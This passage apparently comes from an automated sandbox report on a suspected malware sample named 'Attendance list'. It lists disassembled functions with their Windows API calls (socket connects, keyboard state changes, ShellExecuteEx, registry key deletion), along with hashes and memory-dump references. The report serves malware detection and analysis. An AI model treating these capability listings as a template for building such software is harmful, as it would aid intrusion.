                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                        • String ID: X
                        • API String ID: 774024439-3081909835
                        • Opcode ID: e1eb871df16cd947c32b9450085123dd15d75ef399b50405eecb40506b53940f
                        • Instruction ID: fbf03b4a1ad24a6fd54dd225061938aa408f1ae6ca0269560bd4fb6a3a2558d2
                        • Opcode Fuzzy Hash: e1eb871df16cd947c32b9450085123dd15d75ef399b50405eecb40506b53940f
                        • Instruction Fuzzy Hash: 24C125315083519FC724EB28D895E9AB7F4FF85310F00496DF8999B2A2DB30ED45CB82
                        Function 00936E17 Relevance: 10.8, APIs: 7, Instructions: 250networkCOMMON
                        Download Yara Rule
                        APIs
                        • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00936F14
                        • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00936F35
                        • WSAGetLastError.WSOCK32(00000000), ref: 00936F48
                        • htons.WSOCK32(?,?,?,00000000,?), ref: 00936FFE
                        • inet_ntoa.WSOCK32(?), ref: 00936FBB
                          • Part of subcall function 0091AE14: _strlen.LIBCMT ref: 0091AE1E
                          • Part of subcall function 0091AE14: _memmove.LIBCMT ref: 0091AE40
                        • _strlen.LIBCMT ref: 00937058
                        • _memmove.LIBCMT ref: 009370C1
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                        • String ID:
                        • API String ID: 3619996494-0
                        • Opcode ID: 935490a95b8a8660a7a8392735838300862904e059e74771684c4a164221a0ca
                        • Instruction ID: 6ecc0d6892f02610857993065e52103ae8050db6ead4dd6af420f1817be7a1cf
                        • Opcode Fuzzy Hash: 935490a95b8a8660a7a8392735838300862904e059e74771684c4a164221a0ca
                        • Instruction Fuzzy Hash: 6C81BC71508300ABD724EB68CC86F6BB7A9EF84714F10891DF5569B2A2DA70ED44CB92
                        Function 008C1424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: fcd6e2edac8af27c675afe3bf571506150b2e3a22a9281890a9fa8bfe2367cdd
                        • Instruction ID: 749cf63ec0658427b7552ecd5546a823d6cf3475a886ee85b66f30a611b68553
                        • Opcode Fuzzy Hash: fcd6e2edac8af27c675afe3bf571506150b2e3a22a9281890a9fa8bfe2367cdd
                        • Instruction Fuzzy Hash: DD714934A04109EFCF049F98C889EBEBB79FF86314F148159E915EA252D734EA51CBA4
                        Function 0094B60B Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON
                        Download Yara Rule
                        APIs
                        • IsWindow.USER32(00FF55E8), ref: 0094B6A5
                        • IsWindowEnabled.USER32(00FF55E8), ref: 0094B6B1
                        • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0094B795
                        • SendMessageW.USER32(00FF55E8,000000B0,?,?), ref: 0094B7CC
                        • IsDlgButtonChecked.USER32(?,?), ref: 0094B809
                        • GetWindowLongW.USER32(00FF55E8,000000EC), ref: 0094B82B
                        • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0094B843
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                        • String ID:
                        • API String ID: 4072528602-0
                        • Opcode ID: 472921b568e36f74ac07c71e519caf08609f6fe964f775d09814d313befb9202
                        • Instruction ID: f5e4aa632189172871ea6bdd51ab803214b8dc27347767177bbf1d4839397523
                        • Opcode Fuzzy Hash: 472921b568e36f74ac07c71e519caf08609f6fe964f775d09814d313befb9202
                        • Instruction Fuzzy Hash: 5D718B34605304AFEB249F64C8A4FAA7BFDFF8A310F154469E949973A1C731E941DB50
                        Function 0093F732 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON
                        Download Yara Rule
                        APIs
                        • _memset.LIBCMT ref: 0093F75C
                        • _memset.LIBCMT ref: 0093F825
                        • ShellExecuteExW.SHELL32(?), ref: 0093F86A
                          • Part of subcall function 008C9997: __itow.LIBCMT ref: 008C99C2
                          • Part of subcall function 008C9997: __swprintf.LIBCMT ref: 008C9A0C
                          • Part of subcall function 008DFEC6: _wcscpy.LIBCMT ref: 008DFEE9
                        • GetProcessId.KERNEL32(00000000), ref: 0093F8E1
                        • CloseHandle.KERNEL32(00000000), ref: 0093F910
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                        • String ID: @
                        • API String ID: 3522835683-2766056989
                        • Opcode ID: 1465dab99a0b610cb980d85b20a50b50b3770a0e266df33f82eba82fa79712e3
                        • Instruction ID: 21b7a87fc9c3d7d62e04a5a4d1f8d77bada9d881ea06868dc10aa37babb765e5
                        • Opcode Fuzzy Hash: 1465dab99a0b610cb980d85b20a50b50b3770a0e266df33f82eba82fa79712e3
                        • Instruction Fuzzy Hash: C1617975E006199FCB14EF68C494AAEBBB4FF48310F1584A9E84AAB351CB30AD40CF91
                        Function 0092145D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON
                        Download Yara Rule
                        APIs
                        • GetParent.USER32(?), ref: 0092149C
                        • GetKeyboardState.USER32(?), ref: 009214B1
                        • SetKeyboardState.USER32(?), ref: 00921512
                        • PostMessageW.USER32(?,00000101,00000010,?), ref: 00921540
                        • PostMessageW.USER32(?,00000101,00000011,?), ref: 0092155F
                        • PostMessageW.USER32(?,00000101,00000012,?), ref: 009215A5
                        • PostMessageW.USER32(?,00000101,0000005B,?), ref: 009215C8
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: MessagePost$KeyboardState$Parent
                        • String ID:
                        • API String ID: 87235514-0
                        • Opcode ID: 8b2ca7e170e3eecffe4ed46d2c5ddd821b33131a4f03ca9e911d390efcf5a73d
                        • Instruction ID: 84a00365a15a841e7d316c08f04032d04d704048b90646344bd413c13d22db05
                        • Opcode Fuzzy Hash: 8b2ca7e170e3eecffe4ed46d2c5ddd821b33131a4f03ca9e911d390efcf5a73d
                        • Instruction Fuzzy Hash: 7251F4A0A087E53EFB365634AC45FBA7EAD5B56304F084489F1D9458D2C3E8DCE4D790
                        Function 00921276 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                        Download Yara Rule
                        APIs
                        • GetParent.USER32(00000000), ref: 009212B5
                        • GetKeyboardState.USER32(?), ref: 009212CA
                        • SetKeyboardState.USER32(?), ref: 0092132B
                        • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00921357
                        • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00921374
                        • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 009213B8
                        • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 009213D9
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: MessagePost$KeyboardState$Parent
                        • String ID:
                        • API String ID: 87235514-0
                        • Opcode ID: f1b6d1d5af9ffa49e4fb476ed5f4ec5994d16af0fd7aa0159b84ba8db2565e43
                        • Instruction ID: 040b7a2047def16c5aa0b3a0336edde89ef027b5ec81992a9b97bf5e4316f8c4
                        • Opcode Fuzzy Hash: f1b6d1d5af9ffa49e4fb476ed5f4ec5994d16af0fd7aa0159b84ba8db2565e43
                        • Instruction Fuzzy Hash: 7C5126A05087E57DFB3293249C55B7ABFAE5F26300F088489F1D8468D6D395ECA8E760
                        Function 0092589F Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: _wcsncpy$LocalTime
                        • String ID:
                        • API String ID: 2945705084-0
                        • Opcode ID: 2bb15e2a5abb6d4ae857757bb1c4d2f19e85bca0fa581f1d92ecc45d0367372e
                        • Instruction ID: c81b69f926d1f500ee5f8f0df821f67d1334b8210769ac47cbe122c5f78387f4
                        • Opcode Fuzzy Hash: 2bb15e2a5abb6d4ae857757bb1c4d2f19e85bca0fa581f1d92ecc45d0367372e
                        • Instruction Fuzzy Hash: 5A41A5A9C2056976CB11EBB98C8B9CF73ACEF06310F519562F518E3122E734D714C7A6
                        Function 009238AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 009248AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,009238D3,?), ref: 009248C7
                          • Part of subcall function 009248AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,009238D3,?), ref: 009248E0
                        • lstrcmpiW.KERNEL32(?,?), ref: 009238F3
                        • _wcscmp.LIBCMT ref: 0092390F
                        • MoveFileW.KERNEL32(?,?), ref: 00923927
                        • _wcscat.LIBCMT ref: 0092396F
                        • SHFileOperationW.SHELL32(?), ref: 009239DB
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                        • String ID: \*.*
                        • API String ID: 1377345388-1173974218
                        • Opcode ID: 3a18741831043a1331fb913b00b71f221aa2e62ef247d708fdb076fe65dd2ddc
                        • Instruction ID: 88d114eed2a5c843922987998da314706e5f1025412e08fc00d41b4a896cdeb6
                        • Opcode Fuzzy Hash: 3a18741831043a1331fb913b00b71f221aa2e62ef247d708fdb076fe65dd2ddc
                        • Instruction Fuzzy Hash: 8841937150C3959EC751EF64E885ADFB7ECEF8A340F00492EB489C3155EA78D688C752
                        Function 00947500 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON
                        Download Yara Rule
                        APIs
                        • _memset.LIBCMT ref: 00947519
                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 009475C0
                        • IsMenu.USER32(?), ref: 009475D8
                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00947620
                        • DrawMenuBar.USER32 ref: 00947633
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: Menu$Item$DrawInfoInsert_memset
                        • String ID: 0
                        • API String ID: 3866635326-4108050209
                        • Opcode ID: ade47e12bbf441031a776b816683e77390238043ba18d2f31d0a45980f03a37b
                        • Instruction ID: 92fe17b2f23883bd7d175459f0ec719451d850c8d2e2581c52cba66b136a09d6
                        • Opcode Fuzzy Hash: ade47e12bbf441031a776b816683e77390238043ba18d2f31d0a45980f03a37b
                        • Instruction Fuzzy Hash: 0A414775A0460DEFDB20DF94D884EAABBF9FB09314F058029F915AB290D730AD50DFA1
                        Function 0094122D Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON
                        Download Yara Rule
                        APIs
                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 0094125C
                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00941286
                        • FreeLibrary.KERNEL32(00000000), ref: 0094133D
                          • Part of subcall function 0094122D: RegCloseKey.ADVAPI32(?), ref: 009412A3
                          • Part of subcall function 0094122D: FreeLibrary.KERNEL32(?), ref: 009412F5
                          • Part of subcall function 0094122D: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00941318
                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 009412E0
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: EnumFreeLibrary$CloseDeleteOpen
                        • String ID:
                        • API String ID: 395352322-0
                        • Opcode ID: b66b8fe41b7c6e22b972154c3ecaaf700fe571e9a655fd67751b8b83bd6007d1
                        • Instruction ID: e560bdc64f316e9cf8e1839aac1bd2d9224f054ccdcd9c52b233dd48ae8ad330
                        • Opcode Fuzzy Hash: b66b8fe41b7c6e22b972154c3ecaaf700fe571e9a655fd67751b8b83bd6007d1
                        • Instruction Fuzzy Hash: 483129B5911119BFDB149F90DC99EFEB7BCEF09340F00016AE511E2151EA749E859AA0
                        Function 0094653C Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                        Download Yara Rule
                        APIs
                        • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 0094655B
                        • GetWindowLongW.USER32(00FF55E8,000000F0), ref: 0094658E
                        • GetWindowLongW.USER32(00FF55E8,000000F0), ref: 009465C3
                        • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 009465F5
                        • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 0094661F
                        • GetWindowLongW.USER32(00000000,000000F0), ref: 00946630
                        • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0094664A
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: LongWindow$MessageSend
                        • String ID:
                        • API String ID: 2178440468-0
                        • Opcode ID: 50c5670eb1ecae0730477279db02959889f0e91bb22572e790e0f2c43e711092
                        • Instruction ID: 2e1c44e06717ceb7bb88aa930287189c046dfee96afb746fe3383ee6a8725ddb
                        • Opcode Fuzzy Hash: 50c5670eb1ecae0730477279db02959889f0e91bb22572e790e0f2c43e711092
                        • Instruction Fuzzy Hash: 823124B4618215AFDB20CF18EC88F553BE5FB4A314F1901A8F5058F2B5CB71AC40EB42
                        Function 00936486 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 009380A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 009380CB
                        • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 009364D9
                        • WSAGetLastError.WSOCK32(00000000), ref: 009364E8
                        • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00936521
                        • connect.WSOCK32(00000000,?,00000010), ref: 0093652A
                        • WSAGetLastError.WSOCK32 ref: 00936534
                        • closesocket.WSOCK32(00000000), ref: 0093655D
                        • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00936576
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                        • String ID:
                        • API String ID: 910771015-0
                        • Opcode ID: d3669b49dfefce931a490d6f3bb6f5511c8292ea565e3e698d4951460c95514c
                        • Instruction ID: 32654d5fca0ac199039b893e540a1efff72f21604e34e54c38cbce4821f59dc2
                        • Opcode Fuzzy Hash: d3669b49dfefce931a490d6f3bb6f5511c8292ea565e3e698d4951460c95514c
                        • Instruction Fuzzy Hash: BF31A135600218AFDB109F24DC89FBE7BBCEB45714F008069F94ADB291DB74AD04DB61
                        Function 0091E0B5 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON
                        Download Yara Rule
                        APIs
                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0091E0FA
                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0091E120
                        • SysAllocString.OLEAUT32(00000000), ref: 0091E123
                        • SysAllocString.OLEAUT32 ref: 0091E144
                        • SysFreeString.OLEAUT32 ref: 0091E14D
                        • StringFromGUID2.OLE32(?,?,00000028), ref: 0091E167
                        • SysAllocString.OLEAUT32(?), ref: 0091E175
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                        • String ID:
                        • API String ID: 3761583154-0
                        • Opcode ID: 249761f491c95159e543dd011e84d0391fda360c19668fb4254ffb08420056b1
                        • Instruction ID: ccd32fcf2cbd8faf2df2f07d910888ff74318e0f45eb182fc0c425a507cb8b89
                        • Opcode Fuzzy Hash: 249761f491c95159e543dd011e84d0391fda360c19668fb4254ffb08420056b1
                        • Instruction Fuzzy Hash: 6B214136708109BF9B109FA8DC88DAB77EDEB0A760B508125FD15CB2A0DA74DC819B64
                        Function 0094783C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 008C1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 008C1D73
                          • Part of subcall function 008C1D35: GetStockObject.GDI32(00000011), ref: 008C1D87
                          • Part of subcall function 008C1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 008C1D91
                        • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 009478A1
                        • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 009478AE
                        • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 009478B9
                        • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 009478C8
                        • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 009478D4
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: MessageSend$CreateObjectStockWindow
                        • String ID: Msctls_Progress32
                        • API String ID: 1025951953-3636473452
                        • Opcode ID: 12704384372e618a1d61f694a03797d69e05cb6aee22677dc9805fc60f2147c9
                        • Instruction ID: 67c7bcd7e08b95eac6dc5ba01d3094aa6d6fdc4fc6cf683ba7f9f04f9398d0ed
                        • Opcode Fuzzy Hash: 12704384372e618a1d61f694a03797d69e05cb6aee22677dc9805fc60f2147c9
                        • Instruction Fuzzy Hash: 371190B211421DBFEF159FA0CC85EE77F6DEF48798F014114BA08A6190C7729C21DBA0
                        Function 008E41C9 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,008E4292,?), ref: 008E41E3
                        • GetProcAddress.KERNEL32(00000000), ref: 008E41EA
                        • EncodePointer.KERNEL32(00000000), ref: 008E41F6
                        • DecodePointer.KERNEL32(00000001,008E4292,?), ref: 008E4213
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                        • String ID: RoInitialize$combase.dll
